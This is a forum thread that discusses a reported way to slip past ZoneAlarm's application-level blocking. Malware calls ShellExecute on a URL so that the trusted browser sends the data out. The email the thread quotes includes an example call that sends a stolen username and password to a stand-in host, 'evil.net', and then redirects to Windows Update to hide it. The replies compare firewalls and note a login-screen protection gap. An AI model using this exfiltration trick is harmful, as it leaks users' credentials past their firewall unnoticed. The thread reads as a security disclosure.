Bypassing ZoneAlarm
Page 1 of 2 12 LastLast
Results 1 to 10 of 12

Thread: Bypassing ZoneAlarm

  1. #1
    Senior Member
    Join Date
    Jan 2002
    Posts
    244

    Bypassing ZoneAlarm

    Hi everyone this was one email i just got and i thought i post it .........looks like ZoneAlarm users need to do some reconf.

    I don't know if this is a new issue but it is a simple way to

    bypass (in some limited form) ZoneAlarm's Application level

    Internet access blocking.



    Windows dll shell32.dll exports a well known and documented function called

    ShellExecute. From Win32 Programmer's refference:



    >HINSTANCE ShellExecute(

    > HWND hwnd, // handle to parent window

    > LPCTSTR lpOperation, // pointer to string that specifies

    > // operation to perform

    > LPCTSTR lpFile, // pointer to filename or folder name string

    > LPCTSTR lpParameters, // pointer to string that specifies

    > //executable-file parameters

    > LPCTSTR lpDirectory, // pointer to string that specifies default

    directory

    > INT nShowCmd // whether file is shown when opened

    > );



    When the lpFile parameter is an Internet url, windows invokes Internet

    Explorer (or more accurately - the default web browser), which in 99% of

    the cases is allowed to access Internet, with that url. Example:



    ShellExecute(

    0,

    "open",

    "http://evil.net/collect.cgiun=stolen_username&pw=stollen_password"

    0,

    0,

    SW_HIDE //This doesn't work.

    //I think it is supposed to hide the window but ...

    );



    The collect.cgi (after storing stolen_username/stolen_password) could

    redirect the user for example to

    windowsupdate.microsoft.com,

    so that many users will not even suspect anything.



    The info leaked is limited by the maximum allowed url length, but that

    could be more than enough for a malicious application to send some

    username/password/cookie/cc_number info to malicious server.



    This was tested on ZoneAlarm 3.1.395 (freeware) but i guess that all

    versions can be tricked if the user has granted access to his default

    web browser by default (very likely)



    VENDOR STATUS:

    I thing that this is flaw in the core design of ZoneAlarm

    (and/or Windows) and don't see a way it can be fixed.



    WORKAROUND:

    Do not allow ANY application to access Internet by default and

    review each request separately.



    Any comments are wellcome.

    aceh

    My comment on this...........It s ALWAY S safer not allowing any app. to access internet by default!!!
    i m gone,thx everyone for so much fun and good info.
    cheers and good bye

  2. #2
    Priapistic Monk KorpDeath's Avatar
    Join Date
    Dec 2001
    Posts
    2,628
    It may be safer but what a pain in the @ss that would be for my kids. Having to go through 30- 50 "application allow" popups every day. Why not just use a better product? Outpost anyone? Sygate?

    But thanks for the heads up about ZA, not like I'd ever buy it or use it.
    Mankind have a great aversion to intellectual labor; but even supposing knowledge to be easily attainable, more people would be content to be ignorant than would take even a little trouble to acquire it.
    - Samuel Johnson

  3. #3
    Senior Member RoadClosed's Avatar
    Join Date
    Jun 2003
    Posts
    3,834

    lol

    I went to their site to see if this was reported and if they have a patch. The site is down
    West of House
    You are standing in an open field west of a white house, with a boarded front door.
    There is a small mailbox here.

  4. #4
    ZoneAlarm needs to be seriusly checked out-> it MAD.
    Sygate is good
    xxx

  5. #5
    Member
    Join Date
    Oct 2002
    Posts
    31
    good post thanks for the heads up I will try out Sysgate

  6. #6
    Senior Member
    Join Date
    Jan 2002
    Posts
    244
    Originally posted here by KorpDeath
    It may be safer but what a pain in the @ss that would be for my kids. Having to go through 30- 50 "application allow" popups every day. Why not just use a better product? Outpost anyone? Sygate?

    But thanks for the heads up about ZA, not like I'd ever buy it or use it.
    Haha your right with kids using a box this would be a major problem!
    i m gone,thx everyone for so much fun and good info.
    cheers and good bye

  7. #7
    Senior since the 3 dot era
    Join Date
    Nov 2001
    Posts
    1,542
    There are other probs with zonealarm too (at least with the last version I have seen, perhaps it's fixed now but I doubt it)), for instance at the log in screen, ZA is not loaded while the windows networking does. This means that everyone can access the shares on a box, like printing and file sharing, after the log in ZA limits this to the internal network... so a box at the login screen is not protected by ZA. IMHO sygate or outpost are a better choice desktop firewall.

  8. #8
    Senior Member
    Join Date
    Mar 2003
    Location
    central il
    Posts
    1,779
    What’s with all the zone labs bashing. This is a windows issue and will affect any personal firewall the same way...the firewall can stop an application but not a specific site unless you tell it what site to block. More over to pull off this exploit you need to get local access to the system or a Trojan loaded and run on the systems as you cannot normally do shell commands remotely (most windows boxes are not running telnet services). At the point some one is local/has your system compromised with a Trojan they can get your info with out using this method so your best defense in this case is to not let malicious users on the system.

    Victor the true vector defense in Zonlabs is a service and loads when windows boots (as with all services) you are protected as soon as windows boots. The "You are now protected" splash screen is just the intro to the GUI.
    Who is more trustworthy then all of the gurus or Buddha’s?

  9. #9
    Senior since the 3 dot era
    Join Date
    Nov 2001
    Posts
    1,542
    bballad, you have some excellent points, but about the splash screen thingie I have to disagree with you on that. Yep, they say it's true vector defense does what you describe, but I tested this in a little test setup and was able to access the default shares with early versions of zonelabs. That was very surprising cause I thought, like you, that the protection did work before the splash screen. I know the splash screen is only the GUI intro but there seems still to be a slight problem with the true vector idea:
    It was discussed in a thread here at AO. http://www.antionline.com/showthread...ight=ZoneAlarm
    Basicly it means that if you allow local shares, but do not allow local shares in ZA, by setting no trusted neigbourhood networks and highest security degree, it still will allow them when you are at the login screen. This is not a big deal, I know, and probably other products have this weakness too.

  10. #10
    Senior Member
    Join Date
    Jan 2002
    Posts
    244
    This is not a big deal, I know, and probably other products have this weakness too. [/B][/QUOTE]

    Think your right on this one Vic.Software takes time to load before that no defense..........hardware on the other hand.......instant protection!

    But like you said not a big deal if you use a good av product and practise safe computing!
    i m gone,thx everyone for so much fun and good info.
    cheers and good bye

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •